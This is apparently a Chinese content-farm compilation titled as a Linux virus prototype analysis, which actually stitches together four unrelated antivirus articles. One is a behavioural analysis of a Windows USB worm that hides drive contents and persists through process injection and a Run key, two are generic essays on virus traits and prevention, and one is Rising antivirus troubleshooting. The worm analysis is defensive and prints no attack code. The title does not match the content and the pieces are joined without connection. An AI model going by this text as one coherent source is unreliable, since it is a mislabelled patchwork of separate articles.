一个Linux病毒原型分析病毒防范

一个Linux病毒原型分析病毒防范（精选9篇）

一个Linux病毒原型分析病毒防范 篇1

U盘这个移动存储设备由于体积小、容量大、便于携带等优点，给人们的存储数据带来了很大的便利，但正是由于这种便利，也给病毒有了可乘之机，你是否有过拿着U盘到外面打印照片，回来再使用U盘过程中，发现自己的电脑一下就中毒了的经历呢?

U盘病毒对于局域网环境的企业来说也是一个很头疼的事情，由于员工随意插拔使用U盘，经常导致U盘病毒在企业局域网环境下肆意泛滥，给企业网管员带来了不小的麻烦。今天我们分析的这个U盘病毒，会将U盘上的数据隐藏，并会在U盘上生成一个恶意的快捷方式，只要我们打开这个快捷方式，就会触发病毒执行。

病毒样本介绍

先来看一下该病毒样本的相关信息：

File：~%PHENOVECNYE.ini

Size：23M

MD5：69425684F5C155AAD52D0A6C8E41E2FA

瑞星V16+：Worm.Win32.Agent.aym

此病毒样本截图如图1所示，瑞星v16+查杀该样本截图如图2所示。

图1：病毒样本

图2：瑞星V16+对病毒样本查杀截图

病毒样本只是一个lnk快捷方式，并不是~%PHENOVECNYE.ini，我们取消系统的隐藏显示再来看一下。点击工具菜单-文件夹选项，如图3所示，取消隐藏受保护的操作系统文件(推荐)勾选，及隐藏文件和文件夹下面选择显示所有文件和文件夹。

图3：取消系统的隐藏文件

取消系统隐藏文件后，再来看一下病毒样本，文件夹下多了很多文件，如图4所示。

图4：取消系统隐藏文件后，显示出病毒样本~%PHENOVECNYE.ini

我们先来简单分析一下lnk文件，右键点击lnk选择属性，如图5所示。

图5：查看lnk快捷方式文件的属性

我们看到这个lnk快捷方式的目标类型是应用程序，目标是%hoMEdrive%WINDOWSSystem32 undll32.exe ~%PHENOVECNYE.ini,lnk。如图6所示，这个快捷方式原来是调用系统的rundll32.exe来运行~%PHENOVECNYE.ini。大家可能有点奇怪，~%PHENOVECNYE.ini只是一个ini文件，为什么这个快捷方式要通过rundll32.exe来运行它呢?接下来我们再来分析一下~%PHENOVECNYE.ini文件，看它到底是什么文件类型。

图6：查看lnk快捷方式的属性，其目标为%hoMEdrive%WINDOWSSystem32 undll32.exe ~%PHENOVECNYE.ini

我们使用winhex工具打开~%PHENOVECNYE.ini文件，在winhex的字符串显示区域，我们看到了MZ头，标准的pe文件头，如图7所示。

图7：winhex显示~%PHENOVECNYE.ini文件实际上是一个可执行程序

Winhex只是能说明~%PHENOVECNYE.ini文件是一个可执行程序，但具体这个文件是dll或exe，还是驱动?我们使用IDA工具查看一下文件的输出点，如图8所示，IDA显示~%PHENOVECNYE.ini的Exports为DLLEntryPoint，原来这个~%PHENOVECNYE.ini是一个dll文件。我们知道要执行一个dll文件，需要使用系统的rundll32应用程序，有时当然还需要加上dll运行参数，这样才能将dll跑起来。所以有时候我们不能只通过查看文件的扩展名来识别文件类型，有些病毒文件会伪装成正常的系统文件名来迷惑大家。怎么来分辨呢?简单的就是用记事本直接打开文件，查看一下文件头，就大概知道这个文件到底是什么文件类型。

图8：IDA查看~%PHENOVECNYE.ini的Exports为DLLEntryPoint

病毒行为分析

在这次病毒行为分析中，我们使用SFF这款工具。当然，在开始运行病毒前，开启SSF的监控，直接双击lnk快捷方式，过一会儿，SSF监控到如下的病毒行为，如图9所示，rundll32.exe执行C:ATICatalyst.exe。

图9：rundll32.exe执行C:ATICatalyst.exe

点允许后，SSF又监控到是否允许Catalyst.exe创建一个傀儡进程Catalyst.exe，如图10所示。

图10：是否允许创建傀儡进程Catalyst.exe

从图10来看，两个Catalyst.exe的pid是不同的，实际就是Catalyst.exe同时创建了一个傀儡进程，而这个傀儡进程就是它自己。这里继续点允许，SSF监控到C:ATICatalyst.exe要运行C:DOCUME~1ADMINI~1LOCALS~1Tempseynhbuoetjzoetnzoepfqgvpfqkeyne.com，如图11所示。

图11：是否允许Catalyst.exe运行C:DOCUME~1ADMINI~1LOCALS~1Tempseynhbuoetjzoetnzoepfqgvpfqkeyne.com

小结一下：~%PHENOVECNYE.ini跑起来后，首先在C盘下创建ATI文件夹，同时写入病毒文件Catalyst.exe，Catalyst.exe同时会创建一个它本身的傀儡进程，同时还会在系统临时目录下释放一个随机文件名的com病毒程序，之后交由Catalyst.exe来运行com病毒程序，如图12所示。

图12：SSF拦截到的Catalyst.exe运行临时目录下的com病毒程序行为

允许seynhbuoetjzoetnzoepfqgvpfqkeyne.com运行后，SSF也监控到seynhbuoetjzoetnzoepfqgvpfqkeyne.com同时也要创建一个自身的傀儡进程seynhbuoetjzoetnzoepfqgvpfqkeyne.com，如图13所示。

图13：seynhbuoetjzoetnzoepfqgvpfqkeyne.com创建自己为傀儡进程

在允许创建傀儡进程seynhbuoetjzoetnzoepfqgvpfqkeyne.com后，SSF监控到seynhbuoetjzoetnzoepfqgvpfqkeyne.com要运行系统程序wupdmgr.exe，如图14所示。

图14：seynhbuoetjzoetnzoepfqgvpfqkeyne.com要运行系统wupdmgr.exe

wupdmgr.exe是windows update manger的缩写，是自动升级的程序。我们接下来看一下，病毒程序seynhbuoetjzoetnzoepfqgvpfqkeyne.com要调用系统wupdmgr.exe程序干什么坏事。继续允许它运行wupdmgr.exe，SSF监控到seynhbuoetjzoetnzoepfqgvpfqkeyne.com要修改wupdmgr.exe内存数据，如图15所示。

图15：修改wupdmgr.exe内存数据、注入

在我们允许之后，SSF又监控到同样的病毒行为提示，如图16所示。

图16：两次是否允许修改wupdmgr.exe内存数据

在允许修改wupdmgr.exe内存数据后，SSF监控到wupdmgr.exe在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun下，写入名称为47801的启动项，如图17所示。

图17：wupdmgr.exe创建启动项47801

到这里我们先来印证一下SSF监控到这些病毒行为，如图18所示，病毒样本的确是在C盘根目录下创建ATI文件夹并写入病毒文件Catalyst.exe。

图18：病毒样本运行后写入的病毒文件Catalyst.exe

图19所示的是病毒样本~%PHENOVECNYE.ini在系统临时目录下写入的病毒文件seynhbuoetjzoetnzoepfqgvpfqkeyne.com。

图19：系统临时目录下的病毒样本seynhbuoetjzoetnzoepfqgvpfqkeyne.com

再使用xuetr工具查看一下系统当前进程及启动项，如图20所示，在进程列表里我们看到wupdmgr.exe，其父pid为1480，也就是seynhbuoetjzoetnzoepfqgvpfqkeyne.com，seynhbuoetjzoetnzoepfqgvpfqkeyne.com修改wupdmgr.exe内存数据并将其启动起来，为病毒下一步干坏事做好准备。

图20：xuetr进程列表显示wupdmgr.exe已经运行起来

再来看启动项，wupdmgr.exe写入启动项名称为47801，其执行路径为：C:Documents and SettingsAdministratorLocal SettingsTempccwaaiehv.bat，如图21所示。

图21：wupdmgr.exe写入的启动项

右键点击启动项点定位到启动文件，如图22所示，我们来看一下这个bat到底是什么文件。

图22：定位启动文件

图23所示的启动项文件是一个被设置为隐藏的ccwaaiehv.bat。

图23：定位到的病毒文件ccwaaiehv.bat

使用记事本打开这个ccwaaiehv.bat文件，看一下批处理的内容是什么，发现ccwaaiehv.bat其实也是一个pe文件，如图24所示。

图24：ccwaaiehv.bat文件头为MZ标准的pe格式文件

我们提取ccwaaiehv.bat和Catalyst.exe这两文件，使用瑞星V16+查杀一下这两个样本，如图25所示，瑞星V16+对这两个文件报毒，

图25：V16+查杀这两个病毒样本

实际上，在wupdmgr.exe被修改内存数据，并写入启动项47801后，这个病毒整个已经跑起来了。接下来我们就要进一步触发一下这个病毒，看一下这个病毒后续的行为。怎么触发呢?从这个病毒lnk快捷方式的名称为我的移动(4G)及图4来看，我们猜测这个病毒样本可能针对的是移动存储设备U盘来做文章，既然猜测是这样，我们就给染毒环境插入一个正常U盘，如图26所示，是一个实机正常插入的可移动磁盘。

图26：正常的U盘

我们把这个U盘切换到染毒环境的虚拟机，在切换到染毒环境之前我们将processmonitor这个工具的捕捉功能开启，让processmonitor捕捉一下U盘在切换到染毒环境后的一些病毒行为。如图27所示，完好的U盘在切换到染毒环境下，U盘上的数据都看不到了，只剩下一个HB1_CCPA_X6(8GB)的快捷方式。

图27：U盘上的数据只剩下一个2kb的快捷方式

我们来看一下processmonitor工具都捕捉到了哪些病毒行为，病毒是如何将U盘数据隐藏的。由于Processmonitor捕捉到内容较多，如图28所示，我们直接查找wupdmgr.exe，Processmonitor显示进程wupdmgr.exe的pid为，这样我们就可以设置过滤规则，直接查看进程wupdmgr.exe的行为。

图28：Processmonitor显示的wupdmgr.exe的pid为2000

接下来设置规则分别为pid为2000、操作为写入、操作为设置注册表值这三项，如何设置过滤规则就不详细讲解了，看过我们之前的文章，相信大家应该掌握了。如图29所示，我们添加三条过滤规则。

图29：设置过滤规则

设置好规则后，我们看到在插入U盘(盘符为E:)，wupdmgr.exe向U盘写入文件desktop.ini及Thumbs.db，如图30所示。

图30：wupdmgr.exe向U盘写入文件desktop.ini及Thumbs.db

同时还修改系统注册表项HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced的ShowSuperHidden和Hidden的值，如图31所示，图32、33所示的是修改的具体键值数据。

图31：wupdmgr.exe修改注册表值

图32：修改ShowSuperHidden值为0，勾选隐藏受保护的操作系统文件(推荐)

图33：修改Hidden值为2，勾选不显示隐藏的文件和文件夹

这样修改后，我们就无法查看系统隐藏的文件，其目的就是隐藏U盘上的数据，使我们无法查看到，因为病毒将U盘的文件都设置了隐藏属性，同时wupdmgr.exe向U盘写入病毒文件~%YZUAWLLH.ini，如图34所示。

图34：wupdmgr.exe写入病毒文件~%YZUAWLLH.ini

写入的病毒文件和我们之前运行的~%PHENOVECNYE.ini文件名不同，但其实都是同一个病毒程序。Processmonitor工具同时还捕捉到了wupdmgr.exe向U盘写入lnk快捷方式，如图35所示。

图35：wupdmgr.exe写入的以U盘名及大小为文件名的lnk快捷方式

右键查看U盘上lnk快捷方式的属性，发现同样也是通过系统的rundll32来运行的~%YZUAWLLH.ini，手法和我们的本例讲解的病毒样本一致，如图36所示。

图36：U盘上lnk快捷方式属性

病毒处理

以上是病毒样本的行为分析，接下来我们讲一下如何手动处理这个病毒。使用xuetr工具来处理，如图37所示，使用xuetr先结束进程wupdmgr.exe，之后再删除病毒样本写入的启动项及文件，如图38所示。

图37：结束wupdmgr.exe进程

图38：删除病毒写入的启动项47801及对应文件

之后还要删除在C盘根目录下创建的ATI文件夹，如图39所示。

图39：删除病毒写入的ATI文件夹

接下来恢复病毒样本修改的注册表项，如图40所示，使用xuetr注册表定位到HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced，将ShowSuperHidden的值修改为正常1，如图41所示。

图40：恢复病毒修改的ShowSuperHidden的注册表值

图41：修改ShowSuperHidden正常键值为1

如图42及图43所示，使用xuetr工具恢复病毒修改的HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden注册表值。

图42：恢复病毒修改的Hidden的注册表值

图43：修改Hidden正常的键值为1

注册表项修改为正常值后，我们就可以看到U盘上隐藏的病毒文件及一个U盘图标似的文件，如图44所示。

图44：U盘上写入的病毒文件及被隐藏的U盘数据

我们打开那个类似U盘图标的文件夹，如图45所示，所有的U盘数据都在这里。

图45：类似U盘图标下的所有U盘数据

接下来将U盘上病毒写入的病毒文件删除，右键选中U盘上病毒写入的文件点删除即可，如图46所示。

图46：删除U盘上病毒文件

删除之后就剩下了那个类似U盘图标的文件夹，如图47所示，这里可是有我们U盘上的数据，不能删除。如何恢复正常的U盘呢?重新插拔一下U盘即可，如图48所示。至此，我们手动完成了处理这个病毒。

图47：剩余的类似U盘图标的文件夹

图48：重新插拔U盘后，U盘恢复正常

瑞星V16+对病毒预防的方法

来讲解一下如何使用瑞星V16+来防范这类病毒。通过前面对病毒行为的分析，病毒修改了系统wupdmgr.exe内存数据并创建一个自身的傀儡进程wupdmgr.exe。那么我们就使用瑞星V16+的系统加固自定义规则，添加一条文件访问规则，监控任何程序访问或修改c:windowssystem32wupdmgr.exe时都给予提示，如图49所示。

图49：瑞星v16+添加文件访问规则，监控c:windowssystem32wupdmgr.exe

还需要将系统加固的默认优化选项默认放过包含厂商数字签名的程序文件及默认放过瑞星云安全鉴定安全的程序文件勾选取消，如图50所示。

图50：取消系统加固默认优化选项

再跑一下这个病毒样本，跑样本前关闭瑞星文件监控，过一会瑞星V16+系统加固拦截到有可疑程序试图打开c:windowssystem32wupdmgr.exe，如图51所示。

图51：系统加固拦截到可疑程序打开c:windowssystem32wupdmgr.exe

从图51来看，重新运行了病毒样本，该病毒样本在系统临时目录下，创建32位随机命名的com病毒文件。来看一下是否在C盘创建了ATI文件夹并写入了病毒文件Catalyst.exe，如图52所示，果然在C:ATI写入了病毒文件Catalyst.exe，说明病毒已经跑起来了。

图52：再次运行病毒样本，在C:ATI写入病毒文件Catalyst.exe

图52-1所示的是病毒文件Catalyst.exe在系统临时目录下创建32位随机命名的com文件。

图52-1：写入系统临时文件夹的32位随机com病毒文件

图52和图52-1都充分说明病毒已经跑起来了，在瑞星V16+系统加固拦截到病毒样本试图打开c:windowssystem32wupdmgr.exe，注意系统加固默认是阻止，在我们不选择处理方式后，系统加固自动拦截该行为。使用xuetr工具查看当前系统进程里，没有wupdmgr.exe，如图53所示。

图53：当前进程列表没有wupdmgr.exe

继续查看启动项，发现HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun也没有被写入可疑启动项，如图54所示。

图54：xuetr显示无可疑启动项

插入U盘到染毒环境再测试一下，看看U盘的数据是否还会被隐藏并变成一个快捷方式。如图55所示，插入U盘后一切正常，说明设置的规则能成功拦截该样本。

图55：插入U盘到染毒环境，U盘一切正常

剩下的就好办了，手动删除掉病毒创建的两个无用的病毒样本即可，如图56所示。

图56：回收站里被删除的两个无用的病毒样本

​

一个Linux病毒原型分析病毒防范 篇2

随着现代计算机技术的不断完善, 计算机已成为人们工作、学习、生活中不可缺少的辅助工具, 而网络的普及应用也给现代生活带来了很大的便利。然而, 计算机在带来巨大便利的同时, 也带来了不可忽视的问题, 如计算机病毒给网络系统的安全运行带来了极大的挑战, 影响到经济社会的正常运行。2003年1月25日, 在互联网世界发生的“蠕虫王”病毒, 影响类似于“9.11”的恐怖袭击事件, 很多国家的互联网受到严重影响。从美国计算机权威组织报告得知, 全球已发现的计算机病毒总和超过6万多种, 每天还新增100多种以上的病毒, 计算机病毒在2000年造成的全球经济损失高达1.6万亿美元。因此, 随着计算机、网络运用的普及、深入, 防范计算机病毒将越来越受到高度重视, 对计算机病毒与防治的研究的紧迫感就越强, 意义也越重大。

2. 计算机病毒的定义

当前, 国内普遍对计算机病毒的定义是:“计算机程序中破坏计算机功能或者数据, 影响计算机使用, 并且能够自我复制的一组计算机指令或者程序代码”。自80年代世界上第一个病毒程序诞生至今, 已出现了许多不同类型的计算机病毒。

3. 计算机病毒的传播途径、特点及危害现象

计算机病毒是一组通过复制自身来感染其它软件的程序, 当程序运行时, 嵌入的病毒也随之运行并感染其它程序;但不带有恶意攻击性编码的病毒很少, 一旦被事先设定好的环境激发, 就可感染、破坏。

3.1 传播途径

传播途径根据存储介质的不同可以分为:

(1) 软盘传播:由于具有携带方便、通用性强的特点, 病毒容易隐藏其中;

(2) 光盘传播:是指盗版光盘进行传播;

(3) 网络传播:利用网络通信病毒从一个网络传染另一个网络, 或者通过网络对连接在该网络上的计算机相互传播。

3.2 特点

(1) 寄生性:病毒程序依赖于主程序的执行而生成。感染性是其根本属性, 也是查找病毒程序的主要依据。

(2) 传染性:病毒程序如果没有及时处理, 会迅速扩散, 计算机上的大量可执行文件会被感染。

(3) 潜伏性:病毒程序进入系统后, 可以在长时间内隐藏在合法文件中, 当条件满足后, 便会激发。潜伏性愈好, 病毒的传染范围就会愈大。

(4) 隐蔽性:病毒可以无声无息地感染计算机系统而不被察觉, 从隐藏的位置来看, 不同的病毒隐藏在不同的位置, 如扇区, 隐藏文件的形式等。有的病毒可以通过病毒软件检查出来, 有的根本就查不出来, 变化无常, 病毒处理起来很困难。

(5) 可触发性:是指病毒因某个事件或数值的出现, 诱使病毒实施感染或进行攻击的特性。时间、日期、文件类型或某些特定数据等触发条件达到时, 就会启动感染或破坏动作, 使病毒进行感染或攻击;如果达不到, 病毒会继续潜伏。

(6) 衍生性:是指计算机病毒的制造者依据个人的主观愿望, 对某个已知病毒程序进行修改, 衍生出另外一种或多种来源于同一种病毒, 而又有别与源病毒程序的病毒程序。这也许是病毒种类繁多、复杂的原因之一。

(7) 破坏性:计算机病毒一旦发作, 轻则干扰系统的正常运行, 重则破坏磁盘数据、删除文件, 甚至可能导致整个计算机及网络系统瘫痪。

3.3 危害现象

(1) 硬盘无法启动, 系统文件丢失或被破坏。计算机病毒会破坏硬盘的引导扇区后, 使计算机无法从硬盘启动。大部分病毒通过格式化磁盘、删除重要文件、改写文件分配表和目录区、用无意义的“垃圾”数据改写文件、破坏CMOS设置等手段破坏计算机的重要信息数据, 使得计算机系统无法正常启动。

(2) 抢占系统资源。大多数病毒在动态下都是常驻内存, 除VIENNA、CASPER外, 这必然抢占一部分系统资源。病毒所占用的基本内存长度大致与病毒本身长度相当。病毒抢占内存, 导致内存减少, 一部分软件不能运行;还会抢占中断, 干扰系统的正常运行。

(3) 文件目录发生混乱。一是确实将目录结构破坏, 将目录扇区作为普通扇区, 填写一些无意义的数据, 再也无法恢复。二是将真正的目录区转移到硬盘的其他扇区, 只要有计算机病毒, 它能将正确的目录扇区读出, 在应用程序需访问该目录的时提供正确的目录项, 表面上看来与正常情况一样。一旦内存中没有该计算机病毒, 则通常的目录访问方式将无法访问到原先的目录扇区, 而且这种破坏是能够被恢复。

(4) 计算机运行速度变慢。有些病毒为了判断传染激发条件, 要对计算机的工作状态进行监视, 还要插入非法的额外操作, 计算机速度明显变慢, 存储器正常的读写顺序被打乱;还有些病毒为了保护自己, 对磁盘上静态病毒加密, 进驻内存后动态病毒也加密, CPU每次寻址到病毒处时要运行一段解密程序把加密的病毒解密成合法的CPU指令再执行, 病毒运行结束时再用一段程序对病毒重新加密, 这对计算机的正常运行状态既多余又有害。

(5) 给计算机软硬件造成损坏。计算机病毒改写、破坏系统主板上的BIOS程序, 使得系统主板无法正常工作, 从而使计算机系统报废。病毒的编制者一般不会在各种计算机环境下对病毒进行测试, 病毒的兼容性较差, 常导致死机或网络瘫痪, 无法提供正常的服务。

4. 计算机病毒的预防措施

(1) 应养成及时下载系统最新安全漏洞补丁的习惯, 从根源上杜绝黑客利用系统漏洞攻击用户计算机的病毒。

(2) 选择具备“网页防火墙”功能的杀毒软件, 每天升级杀毒软件病毒库, 定时对计算机进行病毒查杀, 上网时一定要开启杀毒软件的实时监控功能, 并且不要随便点击不安全陌生网站, 以免遭到病毒侵害。

(3) 不要随意打开来历不明的邮件和随意下载不可信站点的软件、附件。对网上下载的程序或者文件在运行或打开前要对其进行病毒扫描。

(4) 不要随意浏览黑客网站、色情网站。

(5) 要尽量去备份。备份是最安全和最保险的防范病毒方法, 尤其是重要的数据和文章, 很多时候, 比安装防御产品更重要;而且要备份好可以使用Ghost为系统盘做一个映象文件。如果碰到新的病毒, 连杀毒软件也无能为力, 只得还原映象了。

(6) 定期如每星期都应该对电脑进行一次全面地病毒扫描及杀毒工作, 以便发现并消除隐藏在系统中的病毒。

(7) 应该注意尽量不要所有的地方都使用同一个密码, 这样一旦被黑客测算出来, 造成不必要的损失。

(8) 注意计算机的异常状态, 当不慎染上病毒时, 应该立即将杀毒软件升级到最新版本, 然后对整个硬盘进行扫描操作, 清除一切可以查杀的病毒。

(9) 对于各种可插拔介质, 可开启U盘免疫, 并养成打开前扫描杀毒的习惯。

5. 结束语

当前, 计算机病毒众多新的特征以及发展趋势表明, 目前我国计算机网络安全形势仍然十分严峻, 反病毒业者面临的挑战十分艰巨, 需要不断地研发推出更加先进的计算机反病毒技术, 才能应对和超越计算机病毒的发展, 为电脑和网络用户提供切实的安全保障。虽然计算机病毒可怕, 只要我们从计算机病毒的防范及安全策略做好各项工作, 还是完全可以避免传染上计算机病毒的, 以保护计算机网络安全, 使得计算机网络真正发挥其积极的作用, 促进人类经济、文化、军事和社会活动的健康。

参考文献

[1]张仁斌, 李钢, 侯整风.计算机病毒与反病毒技术[M].清华大学出版社, 2006.

[2]陈立新.计算机:病毒防治百事通[M].北京:清华大学出版社, 2001.

计算机病毒及防范对策分析 篇3

【关键词】计算机病毒；防范；对策

0.前言

随着互联网的不断扩大以及计算机技术的发展，计算机已经逐渐的成为人们工作与生活不可或缺的工具，但是计算机病毒对网络和计算机的攻击强度也越来越大，并且其破坏性也逐渐严重化。计算机病毒一旦发作，不仅会对内存造成严重的冲击，删除文件、修改数据及影响性能，而且还会导致硬盘无法访问甚至擦除硬盘，其最大的危害便是导致网络瘫痪。所以，在当前的网络环境下，防止计算机病毒则成为计算机防毒领域的重大研究课题。

1.计算机病毒的主要特点

1.1清除难度大

通常单机中所存在的计算机病毒，可以借助于格式化硬盘和删除文件等手段加以清除。在网络中，往往只要有一台工作站未将病毒干净的清除，那么便会重新导致网络带毒，甚至清除工作刚刚完成的工作站，也极有可能会遭到带毒工作站的感染。所以，只病毒查杀工作站，是无法将病毒对计算机以及网络的危害解决的。

1.2潜在性及可激发性

计算机病毒的激发有着多种多样的形式，一般可以是用户名、系统日期和内部时钟，还可能是一次网络通信，亦或是网络中的特殊标志。因为网络具备较强的拓展性，可以按照病毒设计者的具体要求，在任何位置和任意时刻均能够激发病毒且发起进攻。计算机系统被感染病毒以后，通常并非会即刻发作，而是在系统中潜藏，等到时机成熟以后便加以发作，破坏计算机系统的性能。

1.3破坏性强

计算机网络中所存在的病毒，会对网络的正常工作造成直接的影响，重则导致部门及企业机密信息的丢失、网络的崩溃以及服务型信息的破坏，轻则会影响计算机工作效率和降低运行速度。被感染病毒后的计算机，通常被迫将网络连接断开，展开单机杀毒，这便对计算机的工作带来严重的影响。

1.4隐蔽性强

不进行计算机病毒代码扫描或者程序代码分析，一般是无法将病毒发现的。这是由于计算机病毒经常性的在磁盘或者正常程序中较为隐蔽的位置附着，在防护措施缺乏的状况下，病毒程度便会将系统控制权掌握，在非常短的时间内产生大量感染。受到感染后，计算机系统一般依然能够继续运行，并且受感染的计算机程序也能够继续得以执行，因而用户很难感到异常。

1.5自我复制能力强

计算机病毒的自我复制能力也被称之为“传染”或者“再生”，是计算机病毒尤为突出的特征之一，是判断是计算机病毒与否的依据。一方面，一旦计算机病毒程序代码进入到计算机当中，并且代码被执行，那么便会对传播条件相符合的介质或者程序加以搜寻，在目标确定后将自身代码插入，从而导致文件的感染，同时对新的病毒进行大量复制。被感染的文件则变成新的计算机病毒，能够借助于网络或介质，对其他计算机迅速的进行感染及破坏。

2.防范计算机病毒的有效对策

面对日益猖狂的计算机病毒，不管是计算机个人用户，还是企事业用户，均应当尽快的将计算机病毒防范意识和信息安全意识树立起来。以下从几方面着手，提出了防范计算机病毒的有效措施：

2.1重视杀毒软件版本的升级

在计算机及网络的使用过程中，广大用户要及时的升级杀毒软件，特别是有着重要提示的版本功能更新，必须立即升级软件版本。应当提起重视的是，应当注意更新杀毒软件病毒库，逐渐的养成定期更新病毒库的良好习惯。对于连接互联网不畅通的用户，应当通过离线下载杀毒软件病毒库的升级功能，确保杀毒软件的及时升级。

2.2安装病毒防火墙产品

对于局域网，应当对网络版杀毒软件加以挑选，将病毒防火墙产品安装在路由器和网关上。网络版杀毒软件的安装，有助于统一自动更新病毒定义库和客户端病毒引擎，实现防杀计算机病毒，还可以实现整个网络的病毒监控。因此，网络版杀毒软件的选择及病毒防护墙产品的安装就显得尤为重要。通常来说，计算机病毒查杀的彻底与否以及界面友好与否、能够实现远程控制与否，均是判别网络杀毒软件的好坏的重要要素。

2.3合理选择反病毒工具

在防范计算机病毒方面，广大用户必须找出与自身使用环境相适应的反病毒工具。正是因为当前的计算机病毒有着多样化的形式，散播速度以及变种速度非常迅速，极难想象在如此恶劣环境中，不装设反病毒软件件的一台“裸机”，怎样避免计算机病毒的攻击。现阶段，在反病毒软件市场中，各类反病毒软件都有着自身的弱势及强势，但是就普通的用户而言，必须选择有着强大引擎功能的反病毒软件，还应当能够考虑快速及时更新病毒库与否，带有防火墙与否，拥有主动防御技术与否，运用安全技术与否等等。

2.4提高安全防范意识

在浏览网站的过程中，用户必须时刻的提起警惕，将自我保护的安全意识增强。对于不熟悉的陌生网站，用户切勿轻易浏览点击。相当一部分的陌生网站均有着有害恶意代码植入，也可能是冒名顶替的钓鱼网站以及不健康的网站，如果用户不小心将这些网络页面打开，那么便马上被植入木马或者病毒。所以，用户应当尽可能去访问浏览大型门户网站，并且注意域名存在冒名顶替的迹象与否。对于此类状况，首先用户应当从主观上防止对陌生网站的浏览，并且将网页防火墙打开，最大限度的减少木马及病毒所带来的侵害。除此之外，在网上下载软件和资料时，用户还应当注意下载之前进行病毒的查杀，切实的确认安全以后再加以使用。

3.结束语

总之，计算机病毒对计算机以及网络的安全运行构成了极大的威胁，面对计算机病毒的层出不穷和计算机病毒种类的不断变化，广大用户应当尽快强化安全防范意识，并且将网络安全技术和防病毒软件综合起来，从而维护计算机网络的安全。

【参考文献】

[1]李传良.制作、传播计算机病毒犯罪现状、特点及防范对策[J].山东警察学院学报，2009，6（3）：73-75.

[2]周志杰.计算机病毒的特征及防范对策探析[J].太原城市职业技术学院学报，2012，5（11）：178-180.

[3]王丹.计算机病毒的特征与防范对策[J].中外企业家，2011，4（18）：53-55.

一个Linux病毒原型分析病毒防范 篇4

通常情况下，用户反馈的关于瑞星杀毒软件网络版“无法处理”某病毒的情况可以分为以下三种，具体如图1所示。

图1

其中，用户反馈的瑞星不能清除某病毒，最常见的情况是瑞星发现了某病毒并对其进行了清除/删除，但是重新启动计算机后再次查杀，仍然会报病毒。目前比较流行的MS08-067病毒就属于此类，此类病毒多通过系统漏洞、局域网共享来传播，若要彻底处理网内此病毒，需要一些方法措施，比方说修复系统高危漏洞、禁用局域网共享(包括默认共享)、对共享服务器的共享目录进行访问限制、针对不同用户增加权限加以过滤、不要以一些常见的弱口令作为共享密码/登录密码/域账号密码等。此外，访问的网页、使用的U盘、下载的软件、没有彻底查杀的压缩包中的病毒都是杀完后重新感染的来源，所以一定要保证瑞星所有监控处于开启状态，可有效地防止病毒再次感染。

另外一种比较常见的情况是瑞星能够扫描到某病毒，但是无法彻底清除、删除染毒文件，比较常见的有以下四种原因。

一、染毒文件位于系统还原路径、IE缓存文件夹下

这样的情况会造成由于windows自身的机制而无法彻底清除病毒，不过这类病毒可以通过一些简单的方式直接处理干净。比方说那些位于系统还原路径下的病毒，可以通过关闭系统还原达到彻底清除病毒的目的。下面以windows7为例，介绍如何关闭系统还原。

1.右键点击“计算机”，点击“属性”。(图2)

图2

2.左上方点击“系统保护”。(图3)

图3

3.选中需要关闭系统还原的驱动器，点击“配置”。(图4)

图4

4.选择“关闭系统保护”。(图5)

图5

关闭系统还原后，原先位于系统还原路径下的病毒即可彻底清除。

二、Window文件保护导致的病毒总杀总有用户系统存在异常现象，导致文件保护功能异常，虽然可以清除病毒但是windows文件保护机制会将备份的染毒文件替换已经恢复正常的文件。

图6

对于这种情况，可以通过使用瑞星安全助手修复异常的注册表值来处理。

三、正常模式下，清除失败或者删除染毒文件失败造成这种结果的情况也有很多种：

第一种情况就是位于硬盘上的引导性病毒，这种病毒系统启动后就驻留内存，正常情况下无法彻底清除，可以选择通过瑞星引导杀毒来处理此类病毒。下面介绍如何制作linux引导杀毒盘和如何进行linux引导杀毒。

A.如何制作LINUX引导杀毒盘

瑞星LINUX引导光盘镜像的下载地址：rsdownload.rising.com.cn/for_down/ravlinux//linux.iso

在点击下载地址下载引导杀毒光盘映像后，将其刻录到光盘。

如果没有刻录机，并且存在安装瑞星个人版杀毒软件/全功能软件的客户端，还可以使用一个更简便的方法——使用U盘制作LINUX引导毒。

制作方法：将一个空U盘插入到电脑，打开个人版瑞星杀毒软件/全功能软件，选择瑞星工具-linux引导盘制作工具，按照提示进行操作即可。

B.如何进行LINUX引导杀毒

1.首先要设置计算机为光盘启动或U盘启动。(具体设置方法参考计算机主版说明书或咨询硬件厂商客服)

2.将制作好的光盘放入光驱(U盘需在开机或重启前先连接到电脑)，启动后可以看到如下的提示。

3.选择语言，简体中文，点击确定。(图7)

图7

4.杀毒软件启动后，选择设置。(图8)

图8

5.选择发现病毒时进行自动清除。选择清除失败时进行询问后处理。(图9)

图9

6.点击杀毒，便开始对计算机进行全盘查杀。杀毒结束后点击退出，然后取出光盘或拔出U盘，重启计算机。

此外如果染毒程序正在运行中，受到了系统保护，这种情况肯定是无法直接处理的，对于非系统程序，可以尝试从任务管理器中结束此进程后再删除，如果无法通过任务管理器删除，则可能此进程为双进程保护或者病毒在设计上就屏蔽了此操作等原因，对于这种情况，建议进入安全模式下全盘杀毒，

对于一些感染型病毒，尤其是被感染的系统文件，甚至包括瑞星的自身文件的病毒，一旦感染这种病毒，首先尝试进入安全模式全盘杀毒，看是否可以正常杀毒并处理，如果不能彻底清除，建议使用瑞星PE版杀毒以达到彻底处理的目的。下面介绍下瑞星PE杀毒的详细步骤。

1.该版本必须在不解压缩的状态下通过刻录光盘或其他方式拷贝到由于病毒原因无法安装瑞星杀毒软件计算机中任意磁盘目录下。(如果解压缩拷贝可能会造成文件被病毒感染无法正常运行的情况)

2.通过开机加载windows PE系统的方式，找到之前拷贝的PE版瑞星2011杀毒压缩文件并正常解压缩后运行执行杀毒.exe进程即可，如图10。

图10

等待查杀清除病毒结束后，重启计算机即可。

使用PE杀毒注意事项：

1.开机引导的windows PE系统针对某些使用磁盘阵列的服务器，可能会因为没有磁盘阵列驱动导致无法找到正常系统所使用的磁盘，故请更换查找适合此类型磁盘的相关windows PE系统版本。

